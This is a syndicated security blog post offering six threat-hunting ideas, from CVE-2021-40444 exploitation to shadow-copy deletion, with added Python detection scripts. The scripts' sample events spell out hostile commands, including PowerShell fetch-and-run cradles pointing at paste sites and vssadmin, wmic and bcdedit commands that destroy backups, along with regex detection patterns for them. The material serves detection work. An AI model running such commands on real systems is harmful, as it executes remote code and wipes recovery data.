6 Threat Hunting Ideas You Can Use Today!
Threat hunting is often referred to as a semi-scientific practice. Indeed, hunters will deploy hypothesis-based hunts, collect evidence, and document their findings – all of which should (hopefully) bring back fond memories of 9th grade science class. And just like in high school, the hardest part of the scientific process (and threat hunting) is often coming up with an idea to scientifically test. That’s why we’ve put together 6 threat hunting ideas you can start using today!
Before we start
Before I go through our 6 threat hunting ideas, I wanted to let you know that all of the threat hunting ideas you are going to see below are available for FREE as hunting packages on our threat hunting content platform, HUNTER! If you want the query, runbook, and more, go to https://hunter.cyborgsecurity.io, click Sign Up, and use promo code “HUNTIDES” for your free Community Edition account!
With that out of the way, let’s dive into some threat hunting ideas on what to look out for!
Threat hunting ideas #1: Look for exploitation of high-value vulnerabilities
One of the simplest threat hunting ideas is to look for behaviors that correspond to active exploitation of high-value vulnerabilities. Adversaries often rely heavily on a small set of vulnerabilities that they know how to exploit reliably. A good example of this is CVE-2021-40444:
Microsoft Word Control Panel Launch Process – Potential Exploit CVE-2021-40444
In September 2021 Microsoft disclosed a zero-day vulnerability, CVE-2021-40444, in the MSHTML rendering engine that was being exploited through malicious Microsoft Word documents. The vulnerability allowed code execution from a Word document without any macro: a document that referenced attacker-controlled content caused Word to download and execute a payload with no further user interaction once the document was opened. The exploit seen in the wild used the Control Panel executable (control.exe) to load a DLL disguised as an .inf file from one of several directories. This is abnormal behavior: .inf files are normally associated with driver and setup installation, and control.exe is not a process that Microsoft Word should be spawning.
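The hunt described above, as an added example (not the post's HUNTER package): it runs the logic over a handful of constructed Sysmon-style process-creation events. The events, the host names, the Temp-directory scoring, and the inclusion of Excel and PowerPoint as parents are assumptions made for the example.

```python
import re

# Constructed sample process-creation events (field names follow Sysmon Event ID 1).
# These are not real telemetry from the original post.
EVENTS = [
    {"host": "ws01",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\control.exe",
     "CommandLine": r'"C:\Windows\System32\control.exe" ".cpl:../../../AppData/Local/Temp/Low/ministry.inf"'},
    {"host": "ws02",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\control.exe",
     "CommandLine": r'"C:\Windows\System32\control.exe" /name Microsoft.NetworkAndSharingCenter'},
    {"host": "ws03",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe shell32.dll,Control_RunDLL "C:\Users\bob\Documents\setup.inf"'},
    {"host": "ws04",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 12288"},
]

# Word is the case the post documents; Excel and PowerPoint are added as an
# assumption because they embed the same OLE/ActiveX machinery.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# control.exe opens Control Panel items by way of rundll32 shell32.dll,Control_RunDLL,
# so both binaries are treated as ".inf/.cpl loaders" here.
CPL_LOADERS = {"control.exe", "rundll32.exe"}
# An .inf or .cpl reference anywhere in the command line, including the ".cpl:"
# handler form with path traversal that was reported for this exploit.
INF_OR_CPL = re.compile(r"\.cpl:|\.inf\b|\.cpl\b", re.IGNORECASE)
TEMP_DIR = re.compile(r"[\\/]temp[\\/]", re.IGNORECASE)


def basename(path):
    """Case-folded file name of a Windows path, tolerant of forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_office_cpl_load(ev):
    """True when an Office process spawns control.exe/rundll32 with an .inf/.cpl argument."""
    return (basename(ev["ParentImage"]) in OFFICE_PARENTS
            and basename(ev["Image"]) in CPL_LOADERS
            and INF_OR_CPL.search(ev["CommandLine"]) is not None)


def hunt(events):
    """Return (host, child image, severity) for each matching event.

    Severity is bumped to 'high' when the .inf lives under a Temp directory,
    which is where a just-downloaded payload would usually land (assumption)."""
    hits = []
    for ev in events:
        if is_office_cpl_load(ev):
            severity = "high" if TEMP_DIR.search(ev["CommandLine"]) else "medium"
            hits.append((ev["host"], basename(ev["Image"]), severity))
    return hits


if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(hit)
```

Only the two Word-spawned loaders are returned; control.exe launched from Explorer and the print spooler helper Word legitimately starts are left alone.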
Threat Hunting Ideas #2: Look for the Masquerade
Another quick win for hunt teams is seeking out the masquerade. More often than not, adversaries and malware try to blend in with the background activity of a compromised system, for example by cloaking their processes behind legitimate-sounding process names. A common example that has been widely abused is Microsoft Defender.
Hiding Processes as the Microsoft Malware Protection Engine
The Microsoft Malware Protection Engine resides in the C:\Program Files\Windows Defender or C:\ProgramData\Microsoft\Windows Defender folders. All legitimate executions of the application should be spawned from these locations. This package identifies any outliers that are not running from these folders, indicating that a process is impersonating the legitimate Microsoft Malware Protection Engine.
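An added example of that outlier check (not the post's package). The sample events are constructed; note the comparison is done on path components rather than string prefixes, so a sibling folder such as "Windows Defender Update" is not mistaken for the real one.

```python
from pathlib import PureWindowsPath

# The two folder trees named in the post. The Platform\<version>\ subfolder of the
# ProgramData tree is where the engine actually runs from on current builds.
EXPECTED_ROOTS = [
    r"C:\Program Files\Windows Defender",
    r"C:\ProgramData\Microsoft\Windows Defender",
]
# Binaries that ship with the engine (assumption: extend to the set your estate uses).
DEFENDER_BINARIES = {"msmpeng.exe", "mpcmdrun.exe", "nissrv.exe"}

# Constructed process events, not real telemetry.
EVENTS = [
    {"host": "ws01", "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2107.4-0\MsMpEng.exe"},
    {"host": "ws01", "Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe"},
    {"host": "ws02", "Image": r"C:\Users\Public\MsMpEng.exe"},
    {"host": "ws03", "Image": r"c:\programdata\microsoft\windows defender\platform\4.18.2107.4-0\msmpeng.exe"},
    {"host": "ws04", "Image": r"C:\ProgramData\Microsoft\Windows Defender Update\MsMpEng.exe"},
    {"host": "ws05", "Image": r"C:\Windows\System32\svchost.exe"},
]


def _parts(path):
    """Case-folded path components, so comparisons are per folder, not per character."""
    return PureWindowsPath(path.lower()).parts


def under_expected_root(image):
    """True if every leading component of the image path matches one of the known roots."""
    parts = _parts(image)
    for root in EXPECTED_ROOTS:
        root_parts = _parts(root)
        if parts[:len(root_parts)] == root_parts:
            return True
    return False


def find_masquerades(events):
    """Defender-named binaries executing from anywhere outside the expected folders."""
    return [(ev["host"], ev["Image"]) for ev in events
            if PureWindowsPath(ev["Image"]).name.lower() in DEFENDER_BINARIES
            and not under_expected_root(ev["Image"])]


if __name__ == "__main__":
    for hit in find_masquerades(EVENTS):
        print(hit)
```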
Threat hunting ideas #3: Look for suspicious uses of online services
Another high-fidelity threat hunting idea is to look for suspicious use of online services, including services that are banned in your environment. These services are often used to bring an actor's tools into an environment, but they can also serve as a data exfiltration channel.
Using Dropbox API – Attempting Upload/Download
Identify use of the Dropbox HTTP API via the URL string. Although Dropbox API traffic can be very common, observing a PDF upload or download involving a particular temporary directory could indicate activity related to Nobelium (UNC2452) reported in May 2021. Nobelium's BoomBox downloader used the Dropbox API to send information about the compromised machine and to download another payload, which was saved to a folder in the user's AppData directory and launched with rundll32.exe.
PowerShell Pastebin Download
This threat abuses PowerShell commands to download and execute code hosted on normally benign sources such as Pastebin, GitHub, and similar services. This method has been used by the REvil ransomware campaign and is a malware distribution technique that blends in because the hosting sites are widely trusted.
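Both of the online-service hunts above, as one added example (not the post's packages). The first half flags PowerShell download cradles that fetch from paste or code-hosting sites, and it decodes -EncodedCommand payloads first so a URL hidden in base64 is still matched. The second half correlates Dropbox file-API requests with a PDF written under a Temp directory by the same process. The host list, event shapes (an EDR that records per-process HTTP requests and file creations) and all sample events are assumptions made for the example.

```python
import base64
import re
from urllib.parse import urlparse

# --- PowerShell cradles pointing at paste / code-hosting sites ----------------------
# Hosts are an assumption; extend to whatever "benign" hosting your intel names.
PASTE_HOSTS = {"pastebin.com", "raw.githubusercontent.com", "gist.githubusercontent.com"}
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b|Net\.WebClient", re.I)
URL = re.compile(r"https?://[^\s'\"<>)]+", re.I)
# -e / -ec / -enc / -EncodedCommand followed by base64 of UTF-16LE script text
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def expand_encoded_command(cmdline):
    """Append the decoded -EncodedCommand payload so URLs hidden in it can be matched."""
    m = ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def paste_site_cradle(cmdline):
    """Return the paste/code-hosting host a PowerShell cradle fetches from, else None."""
    text = expand_encoded_command(cmdline)
    if not CRADLE.search(text):
        return None
    for u in URL.findall(text):
        host = (urlparse(u).hostname or "").lower()
        if host in PASTE_HOSTS:
            return host
    return None


# Constructed command lines; the encoded one is built here from plain text.
_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/Ab12Cd34')"
_ENCODED = base64.b64encode(_SCRIPT.encode("utf-16-le")).decode()
CMDLINES = [
    "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/x/y/main/s.ps1')\"",
    "powershell.exe -nop -w hidden -EncodedCommand " + _ENCODED,
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
    "powershell.exe -c \"Invoke-WebRequest https://updates.example.com/agent.msi -OutFile a.msi\"",
]

# --- Dropbox file API correlated with a PDF written to a Temp directory ---------------
DROPBOX_FILES_API = re.compile(r"^https://content\.dropboxapi\.com/2/files/(upload|download)\b", re.I)
TEMP_PDF = re.compile(r"[\\/]temp[\\/].*\.pdf$", re.I)

HTTP_EVENTS = [  # constructed: (host, pid, url) as an EDR with HTTP visibility would record
    {"host": "ws01", "pid": 4120, "url": "https://content.dropboxapi.com/2/files/download"},
    {"host": "ws01", "pid": 4120, "url": "https://content.dropboxapi.com/2/files/upload"},
    {"host": "ws02", "pid": 880,  "url": "https://content.dropboxapi.com/2/files/upload"},
    {"host": "ws03", "pid": 912,  "url": "https://api.dropboxapi.com/2/users/get_current_account"},
]
FILE_EVENTS = [  # constructed: Sysmon Event ID 11-style file creations with the writing pid
    {"host": "ws01", "pid": 4120, "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\report.pdf"},
    {"host": "ws02", "pid": 880,  "TargetFilename": r"C:\Users\alice\Dropbox\invoice.pdf"},
    {"host": "ws03", "pid": 912,  "TargetFilename": r"C:\Users\carol\AppData\Local\Temp\notes.pdf"},
]


def dropbox_temp_pdf(http_events, file_events):
    """Processes that both used the Dropbox files upload/download endpoint and wrote a .pdf under Temp."""
    api_users = {(e["host"], e["pid"]) for e in http_events if DROPBOX_FILES_API.match(e["url"])}
    return sorted({(f["host"], f["pid"], f["TargetFilename"]) for f in file_events
                   if (f["host"], f["pid"]) in api_users and TEMP_PDF.search(f["TargetFilename"])})


if __name__ == "__main__":
    for c in CMDLINES:
        print(paste_site_cradle(c))
    print(dropbox_temp_pdf(HTTP_EVENTS, FILE_EVENTS))
```

The Dropbox desktop client on ws02 talks to the same endpoint but writes into the user's Dropbox folder, so it does not fire; ws03 wrote a Temp PDF but only called an account endpoint. Tuning both halves is mostly a matter of widening or narrowing those allow-lists.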
Threat Hunting Ideas #4: Check for Suspicious Registry Usage
A good place to start a hunt is the registry. Many adversaries and malware use the registry for persistence, especially keys under CurrentVersion. If you're looking for evidence of suspicious activity, the Windows Registry is a great place to start.
VBScript Stored in a Non-Run CurrentVersion Registry Key Value
Identify a potentially new registry key that is a non-autorun, non-Run key under HKLM\Software\Microsoft\Windows\CurrentVersion and whose value contains VBScript. The Windows Registry is a database of settings used by Microsoft Windows system applications and basic utilities. The registry is often abused by adversaries to store configuration information, hide code, evade detection, inhibit system operation, and establish persistence. The CurrentVersion key in the HKCU (Current User) and HKLM (Local Machine) hives is one of the most used registry keys, specifically the Run key beneath it. Because of this, the Run key is closely monitored by detection and prevention tools. The technique targeted in this package only uses other keys under CurrentVersion to add malware configuration information and potentially establish persistence, most likely because of the scrutiny defense tools apply to the Run key.
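The registry hunt above, as an added example (not the post's package), run over constructed Sysmon Event ID 13 (registry value set) records. It keeps only values written under CurrentVersion, drops the Run-family subkeys that autorun monitoring already covers, and then looks for VBScript markers in the value data. The marker list, the subkey list and every sample record are assumptions for the example.

```python
import re

# Constructed Sysmon Event ID 13 records; not real telemetry.
EVENTS = [
    {"host": "ws01", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\bob\AppData\Roaming\upd.exe"},
    {"host": "ws01", "Image": r"C:\Windows\System32\wscript.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Telemetry\Cfg",
     "Details": 'Set o = CreateObject("WScript.Shell"): o.Run "powershell -w hidden", 0'},
    {"host": "ws02", "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SomeApp\DisplayName",
     "Details": "Some App 1.2"},
    {"host": "ws02", "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop",
     "Details": r"C:\Users\bob\Desktop"},
    {"host": "ws03", "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "TargetObject": r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Setup\Data",
     "Details": 'ExecuteGlobal StrReverse(")""llehS.tpircSW""(tcejbOetaerC = hs teS")'},
    {"host": "ws03", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Loader",
     "Details": r"wscript.exe //e:vbscript C:\Users\Public\x.txt"},
]

# HKLM, HKCU, or HKU\<SID>, with or without the WOW6432Node redirection; group 1 is
# everything below CurrentVersion.
CURRENT_VERSION = re.compile(
    r"^(?:HKLM|HKCU|HKU\\[^\\]+)\\SOFTWARE\\(?:WOW6432Node\\)?Microsoft\\Windows\\CurrentVersion\\(.+)$",
    re.I)
# Autorun subkeys that other detections already watch closely; excluded from this hunt.
AUTORUN_SUBKEYS = {"run", "runonce", "runonceex", "runservices", "runservicesonce"}
# Tokens that rarely appear in legitimate configuration data but are the bread and
# butter of VBScript droppers.
VBSCRIPT = re.compile(
    r"CreateObject\s*\(|GetObject\s*\(|WScript\.Shell|Execute(?:Global)?\b|\bSet\s+\w+\s*=|\bvbscript\b",
    re.I)


def subkey_after_current_version(target):
    """First path component below CurrentVersion (lower-cased), or None if not under it."""
    m = CURRENT_VERSION.match(target)
    return m.group(1).split("\\")[0].lower() if m else None


def hunt(events):
    """(host, key, first VBScript marker) for non-Run CurrentVersion values that carry script."""
    hits = []
    for ev in events:
        sub = subkey_after_current_version(ev["TargetObject"])
        if sub is None or sub in AUTORUN_SUBKEYS:
            continue
        m = VBSCRIPT.search(ev["Details"])
        if m:
            hits.append((ev["host"], ev["TargetObject"], m.group(0)))
    return hits


if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(hit)
```

The RunOnce entry on ws03 does contain script but is deliberately skipped here; it belongs to the Run-key hunts this one is meant to complement.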
Threat Hunting Ideas #5: Look for Suspicious Behavior
It may sound a bit like a tautology, but another great way to start the hunt is to look for suspicious behavior. Things like excessive file writes or file modifications can be a sign of ransomware activity on a system. You can also search for files with very unusual file extensions.
Excessive file writing or modification with common ransomware note extensions
Ransomware notes are commonly dropped into well-known paths, such as a user's desktop, so they are more visible; image files, .txt files and .doc files are used as the communication medium. Attackers also leave these notes in every folder or directory they choose to encrypt. This threat focuses on the excessive creation of these notes, which potentially indicates ransomware activity.
Several ransomware variants drop a ransom note in every folder they encrypt, after all files in the folder have been encrypted. The provided logic searches for common file extensions used for ransomware notes and applies a threshold of at least 20 unique folders in which a file with the same name is created or modified.
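The threshold logic above, as an added example (not the post's package). It groups constructed file-creation events by host and file name, counts the distinct folders each name lands in, and reports names at or over the 20-folder threshold together with the processes that wrote them. The extension list beyond what the post names (.html and .hta) and all of the sample data are assumptions.

```python
from collections import defaultdict
from pathlib import PureWindowsPath

# The post names images, .txt and .doc; .html and .hta are added as an assumption.
NOTE_EXTENSIONS = {".txt", ".doc", ".png", ".bmp", ".jpg", ".html", ".hta"}
THRESHOLD = 20


def build_sample_events():
    """Constructed Sysmon Event ID 11 (FileCreate)-style records, not real telemetry."""
    events = []
    for i in range(25):   # one note per encrypted folder on ws01
        events.append({"host": "ws01", "Image": r"C:\Users\bob\AppData\Local\Temp\svc.exe",
                       "TargetFilename": rf"C:\Users\bob\Documents\proj{i}\HOW_TO_RECOVER.txt"})
    for i in range(3):    # a few README.txt files: ordinary developer activity
        events.append({"host": "ws01", "Image": r"C:\Program Files\Git\git.exe",
                       "TargetFilename": rf"C:\Users\bob\src\repo{i}\README.txt"})
    for i in range(20):   # exactly at the threshold on ws02
        events.append({"host": "ws02", "Image": r"C:\Users\Public\enc.exe",
                       "TargetFilename": rf"D:\shares\finance\{i:02d}\DECRYPT_INSTRUCTIONS.html"})
    for i in range(40):   # desktop.ini everywhere is normal and not a note extension
        events.append({"host": "ws02", "Image": r"C:\Windows\explorer.exe",
                       "TargetFilename": rf"D:\shares\finance\{i:02d}\desktop.ini"})
    return events


def hunt(events, threshold=THRESHOLD):
    """(host, file name, distinct folder count, writing images) for names over the threshold."""
    folders = defaultdict(set)
    images = defaultdict(set)
    for ev in events:
        path = PureWindowsPath(ev["TargetFilename"])
        if path.suffix.lower() not in NOTE_EXTENSIONS:
            continue
        key = (ev["host"], path.name.lower())
        folders[key].add(str(path.parent).lower())
        images[key].add(ev["Image"])
    return sorted((host, name, len(dirs), sorted(images[(host, name)]))
                  for (host, name), dirs in folders.items() if len(dirs) >= threshold)


if __name__ == "__main__":
    for hit in hunt(build_sample_events()):
        print(hit)
```

Carrying the writing process along with the count is what turns a hit into a lead: the same unsigned binary in Temp or Public writing the same file into dozens of folders is the pattern to triage first.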
Threat hunting ideas #6: Look for suspicious behavior involving LOLBins
One of the biggest trends among adversaries these days is their increasing use of so-called “living off the land” binaries (LOLBins): native Windows applications that let actors carry out their activity while avoiding detection by security platforms that trust built-in programs. An example of this is using built-in utilities to delete Volume Shadow Copies (VSCs) to prevent rollback.
Deleting Shadow Copies Using Operating System Utilities
Volume Shadow Copy Service is an infrastructure provided in Microsoft Windows operating systems to perform volume backups or to create consistent, point-in-time copies of data (known as shadow copies). Because shadow copies let a user revert an NTFS volume to a specific point in time, they are often targeted by malware. Almost all ransomware variants ensure destruction of Volume Shadow Copy (VSC) backups so the infected user cannot easily restore their encrypted files. VSC backups have also been observed to be targeted by wiper malware (such as the “Olympic Destroyer” malware, which targeted the 2018 Winter Olympics in PyeongChang, South Korea) and by loader malware (such as the H1N1 Trojan Downloader).
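The shadow-copy hunt above, as an added example (not the post's package), run over constructed process command lines. Besides vssadmin it covers the other built-in routes to the same outcome (wmic, the Win32_ShadowCopy WMI class from PowerShell, wbadmin and bcdedit), matches case-insensitively with flexible whitespace so padding does not evade it, and reports hosts where more than one technique was used. The technique list and sample events are assumptions for the example.

```python
import re

# Each pattern names the LOLBin technique it matches. \s+ between words tolerates
# "vssadmin   DELETE  Shadows" padding; matching is case-insensitive throughout.
PATTERNS = [
    ("vssadmin delete shadows",
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b", re.I)),
    ("vssadmin shrink shadowstorage",
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bresize\s+shadowstorage\b.*/maxsize=", re.I)),
    ("wmic shadowcopy delete",
     re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I)),
    ("powershell Win32_ShadowCopy delete",
     re.compile(r"win32_shadowcopy\b.*(?:remove-wmiobject|remove-ciminstance|\.delete\(\))", re.I)),
    ("wbadmin delete catalog",
     re.compile(r"\bwbadmin(?:\.exe)?\b.*\bdelete\s+(?:catalog|systemstatebackup)\b", re.I)),
    ("bcdedit disable recovery",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*(?:recoveryenabled\s+no\b|bootstatuspolicy\s+ignoreallfailures)", re.I)),
]

# Constructed process-creation events, not real telemetry.
EVENTS = [
    {"host": "srv01", "ParentImage": r"C:\Users\Public\locker.exe",
     "CommandLine": "vssadmin.exe   DELETE   Shadows  /All /Quiet"},
    {"host": "srv01", "ParentImage": r"C:\Users\Public\locker.exe",
     "CommandLine": r'"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete'},
    {"host": "srv01", "ParentImage": r"C:\Users\Public\locker.exe",
     "CommandLine": "bcdedit /set {default} recoveryenabled No"},
    {"host": "srv02", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'powershell.exe -c "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"'},
    {"host": "srv03", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin list shadows"},
    {"host": "srv03", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB"},
]


def classify(cmdline):
    """Names of every shadow-copy-destruction technique the command line matches."""
    return [name for name, rx in PATTERNS if rx.search(cmdline)]


def hunt(events):
    """(host, parent image, techniques) for each event that matches at least one pattern."""
    hits = []
    for ev in events:
        labels = classify(ev["CommandLine"])
        if labels:
            hits.append((ev["host"], ev["ParentImage"], labels))
    return hits


def hosts_with_multiple_techniques(events):
    """Hosts where more than one distinct technique appears; ransomware usually chains them."""
    seen = {}
    for host, _, labels in hunt(events):
        seen.setdefault(host, set()).update(labels)
    return sorted(host for host, techs in seen.items() if len(techs) > 1)


if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(hit)
    print(hosts_with_multiple_techniques(EVENTS))
```

"vssadmin list shadows" is left alone: an administrator listing copies is routine, while deleting, shrinking the store to evict them, or disabling Windows recovery is not. The parent image is carried through because an unknown binary in Users\Public driving these commands is itself the strongest part of the signal.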
Whether you’re just getting started hunting or you’re a seasoned threat hunter, these threat hunting ideas will get you hunting. Don’t forget, if you want to access the full hunting content, you can apply for an exclusive FREE account on the HUNTER threat hunting content platform today!
*** This is a syndicated blog from the Security Bloggers Network of Cyborg Security written by Josh Campbell. Read the original post at: https://www.cyborgsecurity.com/blog/6-threat-hunting-ideas-you-can-use-today/